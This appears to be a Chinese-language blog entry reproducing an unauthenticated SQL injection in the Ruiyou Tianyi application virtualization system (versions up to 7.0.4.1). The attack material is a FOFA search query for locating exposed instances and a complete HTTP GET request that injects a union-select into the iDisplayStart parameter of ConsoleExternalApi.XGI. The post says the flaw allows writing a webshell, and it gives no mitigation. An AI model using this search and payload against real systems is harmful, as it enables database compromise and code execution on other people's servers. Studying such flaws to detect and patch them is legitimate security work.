Babing
Published on 2024-08-30 / 1 Visits
0
0

R1-2瑞友天翼-应用虚拟化系统-SQL

R1-2瑞友天翼-应用虚拟化系统-SQL

漏洞描述:

瑞友天翼应用虚拟化系统存在多处SQL注入漏洞,未经身份认证的远程攻击者可以利用该漏洞在目标系统写入Webshell执行任意代码。

影响版本:

瑞友天翼应用虚拟化系统 <= 7.0.4.1  

网站图片:

image-20240625134719883

网络测绘:

fofa语法:

FOFA:title=“瑞友天翼-应用虚拟化系统” || title=“瑞友应用虚拟化系统”

漏洞复现:

payload:

GET /ConsoleExternalApi.XGI?key=inner&initParams=command_getAppVisitLogByDataTable__user_admin__pwd_xxx__serverIdStr_1&sign=0a3d5f4f69628f32217ea9704d12bd6d&iDisplayStart=1+union+select+1,2,3,4,5,user()%23 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

效果图:
查询当前用户
image-20240619152228885


Comment